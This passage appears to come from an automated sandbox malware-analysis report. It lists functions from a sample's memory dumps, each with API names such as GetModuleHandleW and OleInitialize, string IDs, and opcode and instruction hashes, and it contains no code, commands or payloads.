                                                    • Opcode ID: b041cfa54998e19d20dbeee06bd9e362d0780a93bfaf85855d413f248a2426aa
                                                    • Instruction ID: a7689708cc956b2ac59ccdb26421a576115af9666fb454a76e081afcf1302b3b
                                                    • Opcode Fuzzy Hash: b041cfa54998e19d20dbeee06bd9e362d0780a93bfaf85855d413f248a2426aa
                                                    • Instruction Fuzzy Hash: 091136B1C006599FCB10CF9AC444BDEFBF4AF48324F14826AE818A7650D338A944CFA4
                                                    Function 06853864 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06854F96
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 6ae09ee668049c95b2a56d7ef842bd3d022f6da799fdec2c856a3b156f563790
                                                    • Instruction ID: 6932f4b92e026f6eb334752f74c9163cee1b6ae9625b9388d3c54d14b80d5ddf
                                                    • Opcode Fuzzy Hash: 6ae09ee668049c95b2a56d7ef842bd3d022f6da799fdec2c856a3b156f563790
                                                    • Instruction Fuzzy Hash: 411102B5C007498FCB10DF9AD844ADEFBF4EB49314F11842AD919B7210C3B5A585CFA5
                                                    Function 06854F2B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06854F96
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: d7c5e2dc93375acfa571f92fc999751039637994aa67a8cb68c411f3c9a5ead1
                                                    • Instruction ID: 48ee62f4e4e886c8b51d02ea1356186a9633044730f9a4cc38e25f075e9081f7
                                                    • Opcode Fuzzy Hash: d7c5e2dc93375acfa571f92fc999751039637994aa67a8cb68c411f3c9a5ead1
                                                    • Instruction Fuzzy Hash: 001113B5C002498FCB10DF9AD444ADEFBF4AB49314F15841AD959B7610C375A545CFA1
                                                    Function 0685B961 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0685B9BD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: cb45de58b495d528fb76c119197718b51fb1dc6fcc642c1073cfdc6160a46ccb
                                                    • Instruction ID: 371834f261cb8c472dcc6be0d6dcbe4a37fad7ac3e3e466703b33cf8e33e9bfb
                                                    • Opcode Fuzzy Hash: cb45de58b495d528fb76c119197718b51fb1dc6fcc642c1073cfdc6160a46ccb
                                                    • Instruction Fuzzy Hash: 3C1103B59042499FCB20DF9AD849BCEBBF8EB48324F108459E558A7210D375A544CFA5
                                                    Function 0685B3B4 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0685B9BD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: aa786f9846dcd80ed4b6e092987cc2b11ad867378f3947f2bd444787555fcd7c
                                                    • Instruction ID: 54ffd5ff2652fa11e4e4eef6f995f00db58a6e2e9569006d5c1d783015652057
                                                    • Opcode Fuzzy Hash: aa786f9846dcd80ed4b6e092987cc2b11ad867378f3947f2bd444787555fcd7c
                                                    • Instruction Fuzzy Hash: 301145B1C003488FCB50DF9AD945BDEBBF8EB58324F20845AE958A7310D375A544CFA5
                                                    Function 0685B3B8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0685B9BD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: c457ea0c2dd0f4ec0d1eaf8105ed17b918724aa26eb3b7feeab32dc8427b31a5
                                                    • Instruction ID: a61449943233de87335ebfb932d25e6c2105d1875b643bc7a73e33d60f6d1b29
                                                    • Opcode Fuzzy Hash: c457ea0c2dd0f4ec0d1eaf8105ed17b918724aa26eb3b7feeab32dc8427b31a5
                                                    • Instruction Fuzzy Hash: E21142B08043488FCB60DF9AD448BDEBBF8EB58324F20845AE918B7310D374A944CFA4
                                                    Function 06859B0C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0685B075), ref: 0685B0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 094c7207785fb2f577322bd61128d92a78ac0766893bc69913c1ff824caf5f5f
                                                    • Instruction ID: d8757b941e802d59eccfec417823ece9c40250777affa066f58af02f475b3f3a
                                                    • Opcode Fuzzy Hash: 094c7207785fb2f577322bd61128d92a78ac0766893bc69913c1ff824caf5f5f
                                                    • Instruction Fuzzy Hash: D11148B1900248CFCB60DF9AD444BDEFBF4EB48324F208419D918A7200C375A944CFA4
                                                    Function 0686DBDD Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: 691d48041e54d0c87b575dbdc8c0a96cc15985d2f35ad7776837ea0d5cc6d339
                                                    • Instruction ID: 6f65edc5b56ed9873623e18409f390c2e8fa7f608ee2c980b4d98369957ec29a
                                                    • Opcode Fuzzy Hash: 691d48041e54d0c87b575dbdc8c0a96cc15985d2f35ad7776837ea0d5cc6d339
                                                    • Instruction Fuzzy Hash: F2418E30F00249DFDB65DF66C8946AEBBB2BF86300F144529E506EB340EB75E946CB81
                                                    Function 0686DBF0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: eb4bad234dad00fe0c4476a4f288c91cef471c992f2ff0566ac91b2e1fc67e66
                                                    • Instruction ID: 52bd9202bf5a7b928bc0b02c42bac3fa52aa14f7183a860eedfb1ad5d4a30635
                                                    • Opcode Fuzzy Hash: eb4bad234dad00fe0c4476a4f288c91cef471c992f2ff0566ac91b2e1fc67e66
                                                    • Instruction Fuzzy Hash: D1417F70F00209DFDB65DFA6C5546AEBBB2BF85304F104929E506EB340EBB5E946CB81
                                                    Function 068621BD Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: 369204f8e2d10545d9685069369c01a1e40ade95e04ed4dbfadfcfd020ae6b0e
                                                    • Instruction ID: 0ba29efdea3eaa2721d3e042000ae370bed3c99c72c6816ff35e7e7bbc2d7992
                                                    • Opcode Fuzzy Hash: 369204f8e2d10545d9685069369c01a1e40ade95e04ed4dbfadfcfd020ae6b0e
                                                    • Instruction Fuzzy Hash: B4311030F042018FDB59AB75C62866EBBE3AF89300F1444A9E106DB394DF35DE42CBA1
                                                    Function 068621D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: 1e08e170b42de55aa25525636dd950867ad782a8744282ffd0f5d6b5d5a36e71
                                                    • Instruction ID: 9b62563d29f9669675caa1ff68e00ff80ab2d4d59df3c6687590a855421139a4
                                                    • Opcode Fuzzy Hash: 1e08e170b42de55aa25525636dd950867ad782a8744282ffd0f5d6b5d5a36e71
                                                    • Instruction Fuzzy Hash: 9731EF30F042058FCB59AB75C62866EBBE3ABC9304F1044A9E506DB394DE35DE46CBA1
                                                    Function 068683E0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q
                                                    • API String ID: 0-388095546
                                                    • Opcode ID: 773019e290eb15071601672118a714eea6f625372092b95565752fda405ed97e
                                                    • Instruction ID: caa72512b1c27cfdb752ad328732c74142d76875bfe495b7bd4eb2b9b37bc717
                                                    • Opcode Fuzzy Hash: 773019e290eb15071601672118a714eea6f625372092b95565752fda405ed97e
                                                    • Instruction Fuzzy Hash: D1F0AF71A002088FDFB49E56EA816AD77B9EB40318F144866EA0DCB245C7B1D946CBB1
                                                    Function 06864B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Ocq
                                                    • API String ID: 0-2995510325
                                                    • Opcode ID: 17fb416aa314d6420a9674f70435c5850a0ed1ad6d2b10ed89e61f1189d1d3ad
                                                    • Instruction ID: df178e7bd8f1c0eae6fd8451cacd66422d2c6ddcc69693ad4979e4d1bf8f10b3
                                                    • Opcode Fuzzy Hash: 17fb416aa314d6420a9674f70435c5850a0ed1ad6d2b10ed89e61f1189d1d3ad
                                                    • Instruction Fuzzy Hash: 62F0DA30E54129DBDB14DF95E899BAEBBB2FF88700F204519E502A7394CB741D45CF80
                                                    Function 0686C2A8 Relevance: .6, Instructions: 632COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74fa69b4af760a0f038594802e9efc69e995f3054e97c3fd6676688c5dcbe483
                                                    • Instruction ID: 1a137e4b08e2a7b5d10e5f7f588c32b79bd0fdbf1f0290c7773dcbebeebf14a2
                                                    • Opcode Fuzzy Hash: 74fa69b4af760a0f038594802e9efc69e995f3054e97c3fd6676688c5dcbe483
                                                    • Instruction Fuzzy Hash: 94328234F102098FDB64DB69DA80BAEB7B2FB88314F108529E545EB754DB35EC42CB91
                                                    Function 0686B3DF Relevance: .6, Instructions: 556COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6aea7b4770f63cf425b0712cb07a2d3d0ed2e59f1394dc1e3dca6632f47d5335
                                                    • Instruction ID: 6aa79a4dc0c1fafac5573b70e98b33bfc65d4a906baee829926f7968d71f72a5
                                                    • Opcode Fuzzy Hash: 6aea7b4770f63cf425b0712cb07a2d3d0ed2e59f1394dc1e3dca6632f47d5335
                                                    • Instruction Fuzzy Hash: E8228030E102098FDF64DBAAD5807ADB7F2EB89318F248826F505EB395DA35DC91CB51
                                                    Function 06866300 Relevance: .2, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3cc80b08e7dcabaeee701f1e2e3f6b8e4b3757299cffe6cb59149d542a0ae
                                                    • Instruction ID: 17b04964e5a1964f41afe4df21f299f0e7391b9f49969a29a6b12b9e070d1c39
                                                    • Opcode Fuzzy Hash: a3d3cc80b08e7dcabaeee701f1e2e3f6b8e4b3757299cffe6cb59149d542a0ae
                                                    • Instruction Fuzzy Hash: 9C61D071F000114FCF509A7EC98466FEAD7AFC4220B25443AE90EDB364EE65ED4287C6
                                                    Function 068643B2 Relevance: .2, Instructions: 221COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f41dd740d96d6a91ab08e59592cc3524bab7f8e7371c7b1f4616a58c3d031f1d
                                                    • Instruction ID: f05d211aeb6744fcc607e9684e0ad1481ef68380e7c3e2262741c633e391f226
                                                    • Opcode Fuzzy Hash: f41dd740d96d6a91ab08e59592cc3524bab7f8e7371c7b1f4616a58c3d031f1d
                                                    • Instruction Fuzzy Hash: 59815E30B002099FDF54DFB9D5546AEB7F2AB89304F208529E50ADB394EF70EC428B51
                                                    Function 068643C0 Relevance: .2, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 784decfde2209345f3f8acdf0a8017701ab79cfb5baf827e626e27ac1c5f013c
                                                    • Instruction ID: 2e22d68b9e423c017fe9a990a02132fa2377d6fa84b47fe2b0eba4615a8bbaf4
                                                    • Opcode Fuzzy Hash: 784decfde2209345f3f8acdf0a8017701ab79cfb5baf827e626e27ac1c5f013c
                                                    • Instruction Fuzzy Hash: BE813C30B002099FDF54DFB9D95466EB7F2AB89304F248529E50ADB394EF74EC428B91
                                                    Function 068646CC Relevance: .2, Instructions: 214COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cea3853b4fcb60ed25fdb8aed05bfd55b081c6b802a842d6321e024ff700cf9e
                                                    • Instruction ID: 1c2e5b4accfe2614400e405c1b38459e812c6bb07e9267dc6dff4ae103b80188
                                                    • Opcode Fuzzy Hash: cea3853b4fcb60ed25fdb8aed05bfd55b081c6b802a842d6321e024ff700cf9e
                                                    • Instruction Fuzzy Hash: 6D915C30E102198FDF60DF68C990B9DB7B1FF89304F20C699D549EB255DB70AA858F51
                                                    Function 068646E0 Relevance: .2, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19f2c56837fff08140046d999a6203e4b18b93c59b3039fbb615946775643369
                                                    • Instruction ID: fb38ca7ac7360f02b08dd4ad4c6478ea59e38e85d77440315f22f971f8bf6a0f
                                                    • Opcode Fuzzy Hash: 19f2c56837fff08140046d999a6203e4b18b93c59b3039fbb615946775643369
                                                    • Instruction Fuzzy Hash: 5F915D30E102198BDF60DF69C880B9DB7B1FF89304F20C695E549FB255DB70AA858F51
                                                    Function 0686F031 Relevance: .2, Instructions: 206COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd8726beb2e0d7774d2e2a87154b65446100dcf967cd45defd78e39963c83704
                                                    • Instruction ID: 48b30343e9fbc70b50a4d2359d0cd15a12f6ad8ab22ea3944e55f889a9da4339
                                                    • Opcode Fuzzy Hash: cd8726beb2e0d7774d2e2a87154b65446100dcf967cd45defd78e39963c83704
                                                    • Instruction Fuzzy Hash: 24815C70A002499FDB55DFAAD980AADBBF7FF88300F148569E509EB354DB30E946CB41
                                                    Function 0686F040 Relevance: .2, Instructions: 201COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70a3cd596319e4522b864476c6f924c036313a7e9ecb42c000a563ea6b1cbd76
                                                    • Instruction ID: e2a9b71ca4b42720467f0d691ad27ba2b4fb3b3e70f4d6885bd37c5f1226ac4d
                                                    • Opcode Fuzzy Hash: 70a3cd596319e4522b864476c6f924c036313a7e9ecb42c000a563ea6b1cbd76
                                                    • Instruction Fuzzy Hash: 57713C70A002089FDB55DFAAD980AADBBF7FF88300F148569E509EB354DB30E946CB51
                                                    Function 0686FA70 Relevance: .2, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb9b05d0e9a9bf2c42cbba8132f87c2bfc2b3c01b380f88220ba63cbac47d219
                                                    • Instruction ID: 120c7764c19df4d0efecf7b1c5851b353cbbfa9d76957736d94e6c1e12275f5f
                                                    • Opcode Fuzzy Hash: bb9b05d0e9a9bf2c42cbba8132f87c2bfc2b3c01b380f88220ba63cbac47d219
                                                    • Instruction Fuzzy Hash: 6D51F830B202149FEF71567DE95476F369BD789300F20492AF60EE3798CA29CC5587A2
                                                    Function 0686FCD0 Relevance: .2, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c786c56a7731bbb001da7320b8b92a07c34f5ae80fef151975fb5e9c5cffe6e
                                                    • Instruction ID: f66ae52b58b9ccbe7bdcdf7c2718dbe5c300cb262fc2343e3c79b6181092db91
                                                    • Opcode Fuzzy Hash: 4c786c56a7731bbb001da7320b8b92a07c34f5ae80fef151975fb5e9c5cffe6e
                                                    • Instruction Fuzzy Hash: A051ED31E001058FDF64EBB9F4846ADBBB3EF84314F10886AE21ADB250DB31D955CB81
                                                    Function 0686FA80 Relevance: .2, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa82cb214c5d7ed32f56e7697eb5e6064a6538a754cb8ca126676b801793f1c4
                                                    • Instruction ID: f4fe806b60c6a2f2eaf5b4851178e59ff48ac922e770beeb7c6b0ea277696d0e
                                                    • Opcode Fuzzy Hash: aa82cb214c5d7ed32f56e7697eb5e6064a6538a754cb8ca126676b801793f1c4
                                                    • Instruction Fuzzy Hash: 8F51E930B202149FEF74566DE95472F369FE789314F20492AF70EE3798CA29CC554792
                                                    Function 06865530 Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6210462165cbf1ee04e6e39ee69b4477ee3cd6e5a46978e676d4c5037545671f
                                                    • Instruction ID: 0a3e5968ca061048038b33f15d96a76b501c8a083278ea2fa3fba8d37a0b2cc6
                                                    • Opcode Fuzzy Hash: 6210462165cbf1ee04e6e39ee69b4477ee3cd6e5a46978e676d4c5037545671f
                                                    • Instruction Fuzzy Hash: AC414F71E006098FDF70CE9AD884AAFF7B2FB84310F10492AE216D7654D730E855CB92
                                                    Function 0686DA90 Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc5c3f14d3dbf9bed601802026a0ba7a52130d2516dbbea2908bed974e63c37d
                                                    • Instruction ID: 84a89301ab4fb2d44c31395242be22ab986dfd04d08700340d84e3f8b169ced3
                                                    • Opcode Fuzzy Hash: bc5c3f14d3dbf9bed601802026a0ba7a52130d2516dbbea2908bed974e63c37d
                                                    • Instruction Fuzzy Hash: E431A530F1020A8FCF65DF6AC94069EBBB2FF85304F144929E905EB344DB70A8468B80
                                                    Function 06862081 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ca4d532ccc267daca8cbf61e1c5f540563b9a567fe040b1232f3eaa464744e89
                                                    • Instruction ID: 8813924ef533a4159411a52c75c9c42a958f657c16c3bf10c19a5e8420b341df
                                                    • Opcode Fuzzy Hash: ca4d532ccc267daca8cbf61e1c5f540563b9a567fe040b1232f3eaa464744e89
                                                    • Instruction Fuzzy Hash: E831AB31E002099FCB55DFA5D8A469EBBF2BF89300F108969F906E7740EB31AD42CB40
                                                    Function 06862090 Relevance: .1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f96d3c456bd1af88e516d3d5d450bcfca07996e214d7badac8f0b64b85bd966
                                                    • Instruction ID: 0eea60ef2800759df698e5331e67bd8fb51b789d5111abbe8e53d896e77a4068
                                                    • Opcode Fuzzy Hash: 3f96d3c456bd1af88e516d3d5d450bcfca07996e214d7badac8f0b64b85bd966
                                                    • Instruction Fuzzy Hash: DE316930E102099BDB59DFA5D8A469EB7B2FF89300F108969F906E7350EB71AD46CB50
                                                    Function 0686A418 Relevance: .1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3805f2f7f96a6696041a040cbeeb3c7514e5b8ca8894f487fb1246e88500cc4d
                                                    • Instruction ID: 11dd8d60a504eeff4d654ba69c98f7f833c7a06bb32d8d4d5d2323dd74530112
                                                    • Opcode Fuzzy Hash: 3805f2f7f96a6696041a040cbeeb3c7514e5b8ca8894f487fb1246e88500cc4d
                                                    • Instruction Fuzzy Hash: 2F21B031F100154FDB68DA7DE95476EA3E6EB85324F108939F60EE7354EA21DC428781
                                                    Function 06863FC8 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40b0b8566d41ab0d5e949f6fd4ee7d9b590654f0a32ea4b961fd8cb424f6113b
                                                    • Instruction ID: 472a7c6635f372e497974c31f43cf1349c6362803d8210444041d0972d06be7e
                                                    • Opcode Fuzzy Hash: 40b0b8566d41ab0d5e949f6fd4ee7d9b590654f0a32ea4b961fd8cb424f6113b
                                                    • Instruction Fuzzy Hash: C1217C75E002159FDF50DFA9D980AAEBBF5FB88714F14802AEA05E7384E735D901CB91
                                                    Function 06863FB9 Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
